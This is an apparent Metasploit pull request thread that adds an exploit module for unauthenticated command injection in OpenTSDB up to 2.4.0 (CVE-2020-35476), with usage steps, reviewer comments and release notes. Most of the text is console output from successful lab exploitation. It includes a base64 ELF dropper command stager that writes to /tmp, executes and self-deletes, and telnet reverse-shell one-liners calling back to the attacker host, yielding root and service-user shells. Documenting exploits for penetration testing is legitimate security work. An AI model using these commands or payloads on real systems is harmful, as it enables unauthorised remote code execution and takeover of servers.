Add opentsdb_yrange_cmd_injection module and docs

[ErikWynter]

About

This change adds an exploit module and docs for an unauthenticated command injection vulnerability in OpenTSDB through 2.4.0 (CVE-2020-35476).

Vulnerable Application

OpenTSDB through 2.4.0 is affected. However, the module has only been tested against 2.3.0

Installation Information

I wrote this module using a target I had access to for limited time only. I did try to set up OpenTSDB locally but it kept throwing weird errors when I tried to add data, which is required for exploitation to be possible. In any casevulnerable releases are available here.
Documentation and installation instructions are available here.

Verification Steps

1. Start msfconsole
2. Do: use exploit/linux/http/opentsdb_yrange_cmd_injection
3. Do: set RHOSTS [IP]
4. Do: set LHOST [IP]
5. Do: set SRVHOST [IP]
6. Do: exploit

Options

TARGETURI

The base path to OpenTSDB. The default value is /.

Targets

Id  Name
--  ----
0   Automatic (Unix In-Memory)
1   Automatic (Linux Dropper)

Scenarios

OpenTSDB 2.3.0 - Linux target

msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options

Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      4242             yes       The target port (TCP)
   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0
                                         .0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to OpenTSDB
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
   LPORT  1312             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Linux Dropper)


msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.1.30:1312
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.min
[*] Identified 31 configured aggregators. Using aggregator sum
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgoHJWgCAAUgieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/XeJKe.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/JIulg' < '/tmp/XeJKe.b64' ; chmod +x '/tmp/JIulg' ; '/tmp/JIulg' & sleep 2 ; rm -f '/tmp/JIulg' ; rm -f '/tmp/XeJKe.b64'"]
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (1017704 bytes) to 10.10.1.1
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 4 opened (10.10.1.30:1312 -> 10.10.1.1:47720) at 2022-11-24 19:27:06 +0000

meterpreter > getuid
Server username: root

OpenTSDB 2.3.0 - Unix target

msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options

Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      4242             yes       The target port (TCP)
   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
                                         .0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to OpenTSDB
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
   LPORT  1337             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run

[+] sh -c '(sleep 3851|telnet 10.10.1.30 1337|while : ; do sh && break; done 2>&1|telnet 10.10.1.30 1337 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 10.10.1.30:1337
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.mean_rate
[*] Identified 31 configured aggregators. Using aggregator max
[*] Executing the payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo q08IVzJKPKz8soea;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "q08IVzJKPKz8soea\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (10.10.1.30:1337 -> 10.10.1.1:52370) at 2022-11-24 19:24:06 +0000

id
uid=0(root) gid=0(root) groups=0(root)

[ErikWynter]

FYI in case necessary, I have spool files for both scenarios with HTTPTRACE enabled that I could send by email. Just let me know :)
I also suspect I'll have to rebase with the latest main to stop the tests from failing

[space-r7]

Thanks for the module, @ErikWynter! Code looks good to me. I just had one question.

[cdelafuente-r7]

@msjenkins-r7 test this please

[cdelafuente-r7]

Thanks @ErikWynter for this great module! I just left a couple of comments for you to review before it lands. I also managed to instal version 2.4.0 and tested the module. It works great!

[ErikWynter]

@cdelafuente-r7 great to know the module worked for you! I added the final changes you requested. I wasn't able to test these though because I don't have a target anymore, so I'd suggest giving it a final run before landing to make sure it works as expected. Thanks a lot!

[cdelafuente-r7]

Thanks @ErikWynter! Everything looks good to me now. The lint job failing is due to a missing empty line after guard clause (rubocop checks). I'll fix this myself, no worry.

I tested against OpenTSDB 2.4.0 installed on Ubuntu 20.04.4 and verified I got a session using both targets. I'll go ahead and land it.

Thank you for your contribution!

Example output

Linux Dropper target

msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > exploit rhosts=192.168.100.129 lhost=192.168.100.1 verbose=true

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is OpenTSDB version 2.4.0
[*] Identified 1 configured metrics. Using metric sys.cpu.nice
[*] Identified 35 configured aggregators. Using aggregator mult
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKiQAWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/MhMkx.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/PvTFR' < '/tmp/MhMkx.b64' ; chmod +x '/tmp/PvTFR' ; '/tmp/PvTFR' & sleep 2 ; rm -f '/tmp/PvTFR' ; rm -f '/tmp/MhMkx.b64'"]
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (1017704 bytes) to 192.168.100.129
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.129:41794) at 2022-12-23 15:12:51 +0100

meterpreter > getuid
Server username: opentsdb
meterpreter > sysinfo
Computer     : 192.168.100.129
OS           : Ubuntu 20.04 (Linux 5.15.0-56-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Automatic (Unix In-Memory) target

msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > exploit rhosts=192.168.100.129 lhost=192.168.100.1 verbose=true

[+] sh -c '(sleep 4383|telnet 192.168.100.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.100.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is OpenTSDB version 2.4.0
[*] Identified 1 configured metrics. Using metric sys.cpu.nice
[*] Identified 35 configured aggregators. Using aggregator mimmin
[*] Executing the payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo YpBrTdho9EfmwW6M;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "YpBrTdho9EfmwW6M\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.100.1:4444 -> 192.168.100.129:58554) at 2022-12-23 15:13:25 +0100

id
uid=128(opentsdb) gid=135(opentsdb) groups=135(opentsdb)
uname -a
Linux ubuntu 5.15.0-56-generic #62~20.04.1-Ubuntu SMP Tue Nov 22 21:24:20 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

[cdelafuente-r7]

Release Notes

This adds an exploit module for an unauthenticated command injection vulnerability in OpenTSDB through 2.4.0. This vulnerability is identified as CVE-2020-35476.

[ErikWynter]

Nice! Thanks for testing and landing it so quickly @cdelafuente-r7 !